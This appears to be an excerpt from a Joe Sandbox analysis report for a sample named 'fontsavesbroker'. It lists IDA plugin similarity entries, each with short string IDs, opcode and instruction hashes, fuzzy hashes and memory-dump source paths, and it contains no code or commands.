                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: ;$Z$}
                • API String ID: 0-2180252066
                • Opcode ID: d51357dea481044d2289a2b66d5bd1af9545d954710bb1f4fde5625fce196cc5
                • Instruction ID: e986b4e77b8e8759289d03779cdac5cd7479acc6fe0970122d92f79854d5175a
                • Opcode Fuzzy Hash: d51357dea481044d2289a2b66d5bd1af9545d954710bb1f4fde5625fce196cc5
                • Instruction Fuzzy Hash: E451AF70E0966D8FDBA9DB54C8A0BE9B7B5EF54311F1046EAD00DA72A1CB746A80CF40
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: L$U
                • API String ID: 0-1814620523
                • Opcode ID: 0ac21a37293af77a3e78601022111823351531077d4686f1358e3ecc3598af13
                • Instruction ID: 8db67bc269346738dd3e1178cdfeb01d6e01094613636d9995e2376c4840d8d9
                • Opcode Fuzzy Hash: 0ac21a37293af77a3e78601022111823351531077d4686f1358e3ecc3598af13
                • Instruction Fuzzy Hash: B051F530B08B494FDB5CCE5888A46B977E2FF98301B15467ED45EC72A1CE74E802C780
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: Q$R
                • API String ID: 0-3870444779
                • Opcode ID: e77586657d21184e1feffe6ed4a71281333e1f89e05f4f4af3c952562d6868ba
                • Instruction ID: 171edc668198ae3eeec02f54caf081813d7ce9b523bc57a50c76473b91136b60
                • Opcode Fuzzy Hash: e77586657d21184e1feffe6ed4a71281333e1f89e05f4f4af3c952562d6868ba
                • Instruction Fuzzy Hash: E431CA70E09B6D8FEBA8DF44C8A47ADB7B1EF54312F1041AAD00DA72A1CB745A81DF40
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 1c6d27e5940ddfb4cbb65fcf7c76bee40566468817c772be74286b5de03e52d8
                • Instruction ID: 692f4bddb2a08f2f82095e91846b0cc05b4dc88696d4ecd8ab7e4f75522f3f99
                • Opcode Fuzzy Hash: 1c6d27e5940ddfb4cbb65fcf7c76bee40566468817c772be74286b5de03e52d8
                • Instruction Fuzzy Hash: 75B13347B0F6D20FEB2166BC68B55F97B90EF916A570902F7E098CA0F7EC48650683C1
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 7144ed5cc100c067ffaa6bc281b33717823f14e9c6336de59a729cd4e19203dc
                • Instruction ID: c9a1af434a48cefc50c8b4c0297192f2f51529ad4081108683830f4a3af7f2b8
                • Opcode Fuzzy Hash: 7144ed5cc100c067ffaa6bc281b33717823f14e9c6336de59a729cd4e19203dc
                • Instruction Fuzzy Hash: BA913543B0F7D60FEB2166B868B51F97B91EF516A4B0902F7E098CA0F7AC58650683C1
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: b8e6334230615240bd912cd37cecbbd8b90c8d7c438d9ce5823b5f3f2ae764c0
                • Instruction ID: 80b5547297df689c8462b08d9fc248a260115a8e7c24d2587cd138a9f260cdde
                • Opcode Fuzzy Hash: b8e6334230615240bd912cd37cecbbd8b90c8d7c438d9ce5823b5f3f2ae764c0
                • Instruction Fuzzy Hash: A5812443B0F7D60FEB2166BC68751F97B91EF516A4B0902F7E099CA0F7EC58660682C1
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: f951bda2384a92cc72488b59cb987f5a85414a9f1a58136a64aa7c4a0f0e6a5e
                • Instruction ID: 4cb7c4bee056a25aabcf36a00afb2a793f56e25d3ff2c65f4dbbaac5c4e92c3d
                • Opcode Fuzzy Hash: f951bda2384a92cc72488b59cb987f5a85414a9f1a58136a64aa7c4a0f0e6a5e
                • Instruction Fuzzy Hash: C7813653B0F7C60FEB2166BC68651E97B91EF516A4B0902F7E098CB0F7EC14A50683C1
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 171a1e92eb8068f0ceb68e79539963a8d9d6d4c17c0e085df19b12bf43cb3d5d
                • Instruction ID: cc797dc6b3e8f4cd45dd0a879aa648fe2b0328052c367afab4b1f4fdeb97efd1
                • Opcode Fuzzy Hash: 171a1e92eb8068f0ceb68e79539963a8d9d6d4c17c0e085df19b12bf43cb3d5d
                • Instruction Fuzzy Hash: 1581C031B0DB494FDB58DE5C88A55B977E2FF98301B15027EE49EC32A2DE74AD028781
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: bd32541157e9beca6878a92f13517f1481766e2ad8775c42b80952af7efe33b2
                • Instruction ID: d2096046a7c08d5db7c49dedda3f32cf67b2ed59126516fcaef3ae06ce1e454b
                • Opcode Fuzzy Hash: bd32541157e9beca6878a92f13517f1481766e2ad8775c42b80952af7efe33b2
                • Instruction Fuzzy Hash: 87710683B0F7C60FEB2166F868751F97B91EF516A4B0942F7E0998A0F7EC54660683C1
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: _
                • API String ID: 0-701932520
                • Opcode ID: f29e298d6e8d747b6b22731c859663c857e82d090e6148eeaee1587e39281a29
                • Instruction ID: fc1cecfdff01208ebe18a54a3a521decc23a3eb3fe639cffb7b7953ad24f1e64
                • Opcode Fuzzy Hash: f29e298d6e8d747b6b22731c859663c857e82d090e6148eeaee1587e39281a29
                • Instruction Fuzzy Hash: 9E51292B74D62A4AE7147BBCB8A54FD7350EF94376F0507B7E10D8A0E7DE2831468A90
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 4462d00c71aacefec390a5fe711a648f73df2dd16c0d1c5768eecf8843629843
                • Instruction ID: 7ca4797f1aa0dea5d3628cdb93c342109ba4fb62ed337ea7c297370e8f5cee61
                • Opcode Fuzzy Hash: 4462d00c71aacefec390a5fe711a648f73df2dd16c0d1c5768eecf8843629843
                • Instruction Fuzzy Hash: 81511A70E1961D8FEB64DBA8C4A46EDB7F1FF48300F524279D009E72A2DB786A45CB10
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 777ff7e46afe044f386c3f051890c1ec8b48499674c39a7a41d37c404fa08d6e
                • Instruction ID: 79dea0b7f1b6b10dab7301a261e9cdfae5ed423024cd7690c2bb5c14553c6c98
                • Opcode Fuzzy Hash: 777ff7e46afe044f386c3f051890c1ec8b48499674c39a7a41d37c404fa08d6e
                • Instruction Fuzzy Hash: 3B414631B1E64A0FE765DBB884A56B97BE0EF46310F4642FBD05CC31B6DE68A9028341
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: h
                • API String ID: 0-2439710439
                • Opcode ID: 8eaec4aa670d9ad90b1830d8f2842ca07508820f61a9a27c19a5cf03b8ce6b14
                • Instruction ID: eb2e119606995f5e67193a0f29cbd90413294a572396984c665931fb823541f7
                • Opcode Fuzzy Hash: 8eaec4aa670d9ad90b1830d8f2842ca07508820f61a9a27c19a5cf03b8ce6b14
                • Instruction Fuzzy Hash: 73413A70E19A5D8FDBA8DF188C957A9B7A1FF59301F1002E9D40DE72A2DE746E818F01
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 0a5fd4460a643f388de74e5b980e37a3315cc6283df38752021e8ee89c13d8b3
                • Instruction ID: 14146d42ef88f1ef070108bd823f128c579c1c84032e481cc1bc00f61a6f30ea
                • Opcode Fuzzy Hash: 0a5fd4460a643f388de74e5b980e37a3315cc6283df38752021e8ee89c13d8b3
                • Instruction Fuzzy Hash: 87218B52B0E6875BEB1073B898792E93BD0EF11329F0945B7D059CE0E3ED14A15AC291
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 5f3bb389b32786c58583f58fd0cbaa80d347c2cff89ad64305365c41f0307522
                • Instruction ID: c74e7aa68d7199e1c0f02238133f18ab13e49977ccb835411a1e16c9ca5ca3ab
                • Opcode Fuzzy Hash: 5f3bb389b32786c58583f58fd0cbaa80d347c2cff89ad64305365c41f0307522
                • Instruction Fuzzy Hash: EE219F3098D78A9FD742EBB088685A57BF0EF06310F1645F7D448CB0A2DA289646C720
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 705f3c956f3b7b23fc10c2510377e8fef279b3e078a9d0d16fb7e158fc5f2503
                • Instruction ID: eaf785570a35a37354cb9a17ee8e3694b873d74b854b9078a5c0746f0c59494c
                • Opcode Fuzzy Hash: 705f3c956f3b7b23fc10c2510377e8fef279b3e078a9d0d16fb7e158fc5f2503
                • Instruction Fuzzy Hash: CD119431E19A0E4FEB90EBA8C8996BD77E0FF18700F4246B6D41CC71B6EE74A5448740
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 66354ddd79c5c61a8627a3f46c281523197c1f9a80770dcb0c67a846caa6e825
                • Instruction ID: 0273d7c745f2effa37004361624abea2d3a51dda9069e55c7256d20d0786bd43
                • Opcode Fuzzy Hash: 66354ddd79c5c61a8627a3f46c281523197c1f9a80770dcb0c67a846caa6e825
                • Instruction Fuzzy Hash: 0F11B230B1A64E8EEB59EBA484B86B97BE0FF55305F4106BED41AC74F2DE7466048700
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 6e8e85163360403844213a2dfbf99696d10a78cbbaea5f225b6bf26d7c54284c
                • Instruction ID: 3188b35075921c3b4b9bbe9a9de8736a1399b4d0fd8e2ccd689716f6deb5307a
                • Opcode Fuzzy Hash: 6e8e85163360403844213a2dfbf99696d10a78cbbaea5f225b6bf26d7c54284c
                • Instruction Fuzzy Hash: 7911C631E19A0E4EFB50EBA488A85FD77E1FF58300F4149B6D419C31B5EE34A5448740
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 062ad327ec6dc9391f9eb9b44316c6ec07e85ccd228fa31a75b0af23d4a9cde7
                • Instruction ID: 5c047e9bf3ce80daeefb950376a581e8630e2265c5e5da6536a2f3d55a06a6af
                • Opcode Fuzzy Hash: 062ad327ec6dc9391f9eb9b44316c6ec07e85ccd228fa31a75b0af23d4a9cde7
                • Instruction Fuzzy Hash: 97115E31A19A4E8FDB54EB64C8A96BD7BE0FF18305F5109BED419C71A1DA75A640C700
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 16a81a6dbfd8928c33d26c75dc63d34eb635074dcbb1cf9b1be5357e80a0b109
                • Instruction ID: d15a879d4adfca73462055ff62e45ca999029099fb4ac7b49826a93354447855
                • Opcode Fuzzy Hash: 16a81a6dbfd8928c33d26c75dc63d34eb635074dcbb1cf9b1be5357e80a0b109
                • Instruction Fuzzy Hash: 63018430E1A64E4FE751EBA4849CAB977E0EF1A301F4255B6D418C71B6EA74E5448700
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 50b7807a47507b7e75e66637193bfb35f6e661a87638a5d3c97c4e4d223f885a
                • Instruction ID: e6e30c776f5e900b6f2d424dcd4f2ffe799752eef21de0632bafec044f2335b9
                • Opcode Fuzzy Hash: 50b7807a47507b7e75e66637193bfb35f6e661a87638a5d3c97c4e4d223f885a
                • Instruction Fuzzy Hash: 1E016D30A1E74E4FEB59AB64C8686B97BB0EF15305F4205BED419C70F2EA69A544C700
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 36c62858cacb1674e329d5fb3c14b3a55faca705a3d1323c16897102f01afdda
                • Instruction ID: b20db65a17468be169e22828db3a776f5aa01af3f127d113c1eeaa002c002f9a
                • Opcode Fuzzy Hash: 36c62858cacb1674e329d5fb3c14b3a55faca705a3d1323c16897102f01afdda
                • Instruction Fuzzy Hash: 26F0AF30A1AB4E8FEB94EF6488682FE7BA0FF15312F41057AD81CC21B5DB345650CB40
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 6ce3d2ce49a7fb7faa9a195acfaacbc2dbbb9b1f88b2918b08f5bf0d32cce535
                • Instruction ID: 58baed92ded701fadf5566e768acbb97c7a173881a8fb0cc0e5aa3e522845a5b
                • Opcode Fuzzy Hash: 6ce3d2ce49a7fb7faa9a195acfaacbc2dbbb9b1f88b2918b08f5bf0d32cce535
                • Instruction Fuzzy Hash: 12018430A1E74E4FD752A7B488A86A93BF0EF16305F4649F7D418C70B7EA28A5448750
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 311138d78718fe1e9cfdb3e16e5ccb972e2993cf0762c63e2361318b295ae9d3
                • Instruction ID: 73d5c13792ea4f379fc1d0d182603b01a127fecdcf45628f44f8d4d57b023fb2
                • Opcode Fuzzy Hash: 311138d78718fe1e9cfdb3e16e5ccb972e2993cf0762c63e2361318b295ae9d3
                • Instruction Fuzzy Hash: 7DF02430A1A78E8FDB199FB088646B93BA0FF07305F8145BED819C61E2DB38A504CB40
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 78a3129dc3bcf7b978fbe94fd1ab2011d976a715a812cedfb89c1764f0806d4c
                • Instruction ID: 3d733b5bacd1aa1419e70a79b82f9c839681ccbdba45e6942309d5032c0954a8
                • Opcode Fuzzy Hash: 78a3129dc3bcf7b978fbe94fd1ab2011d976a715a812cedfb89c1764f0806d4c
                • Instruction Fuzzy Hash: 22F13D71E1965E8FEB68DFA8C4A57B8B7A1FF58301F4402BAD00DD72E6DA746940CB40
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5857516bf52b8b6312a9574e9e574ace676e0262860ee414f7cdc0f6411a0965
                • Instruction ID: 86731b395f675f27d2960689e151e05286abeb9892701a219db9c121290a3da3
                • Opcode Fuzzy Hash: 5857516bf52b8b6312a9574e9e574ace676e0262860ee414f7cdc0f6411a0965
                • Instruction Fuzzy Hash: DB41A471E1994E8FEB94DB68C8A5AFC7BE1FF59300F4502B9D00EC32E6DE6569018750
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 90c2e9e107bf103cbf83036ad7da6b55eba44b23d1d70fef1df5ae2a2f6cc7a7
                • Instruction ID: 395c63352de81790010bce6ddca04793cd1f40ffd1133ce85f70531923bd63e2
                • Opcode Fuzzy Hash: 90c2e9e107bf103cbf83036ad7da6b55eba44b23d1d70fef1df5ae2a2f6cc7a7
                • Instruction Fuzzy Hash: 6741A071A19A0E8EE794DF6CD8647AD7BE1EB96314F5002BAD04DC32DADBF914068B40
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1780726810c498ada1515b77a56e59f1715fc07b3ffcf54a1fed08c83693f75
                • Instruction ID: d73d7b23197c278557b3765f5776c214c835b9444367c35ad648905c6ad4125c
                • Opcode Fuzzy Hash: d1780726810c498ada1515b77a56e59f1715fc07b3ffcf54a1fed08c83693f75
                • Instruction Fuzzy Hash: 3D31E970E1DA1D8FEBA4EBA8D4A56ACB7B1FF59300F510279D00DE32A2CE6469418B40
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 42bd22fc8430b7883b4a13e99e64ca19f630d4e865128481c945c367e062b142
                • Instruction ID: 8654ad11bb0dc65e321cabbaacc22f04c8eedd104a8b6063486014b30c8d96c1
                • Opcode Fuzzy Hash: 42bd22fc8430b7883b4a13e99e64ca19f630d4e865128481c945c367e062b142
                • Instruction Fuzzy Hash: D721EE71E09A1D8FEBA4EBA8D4A56BCB7B1FF59300F51023AD00DE32A2DE6469419740
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 865065228c4f399ad44286de971c5e3b812dffaa85400c34fc835fe43a92ff11
                • Instruction ID: e8049d37ba1a6a4021b2d67add660aa200a35e741a1a6a023930a016c6ae0556
                • Opcode Fuzzy Hash: 865065228c4f399ad44286de971c5e3b812dffaa85400c34fc835fe43a92ff11
                • Instruction Fuzzy Hash: 78218F30E0A64E8FEB69EFA484A91BD7BA0FF14304F1205BED419C71B1DB75A640C740
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 049c738657e0783604409de6d8b34992e71445ce957c230c0b6ed199f95ca636
                • Instruction ID: 3fee5478bc3605d4a6c9f6327280c3fba92516f5144c199faa22688fe0ae9c6f
                • Opcode Fuzzy Hash: 049c738657e0783604409de6d8b34992e71445ce957c230c0b6ed199f95ca636
                • Instruction Fuzzy Hash: E2311031E0A61D8EEB64DB94C8A57FCB2B4EF56310F5112B5D01DA31B2DEB86B458A40
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 986bec252ae6e504f30106b321135551d7f2f81b01788d0717deeae71ad10f2f
                • Instruction ID: a026052b56c14f41021afd86c4472fe99f20c07846414dcc9944c38e1f2bb2f6
                • Opcode Fuzzy Hash: 986bec252ae6e504f30106b321135551d7f2f81b01788d0717deeae71ad10f2f
                • Instruction Fuzzy Hash: 51211F31B19A0D8BEF64EB94C8A4EED73B5EF54300F114275D409D72A5DE74AA458B80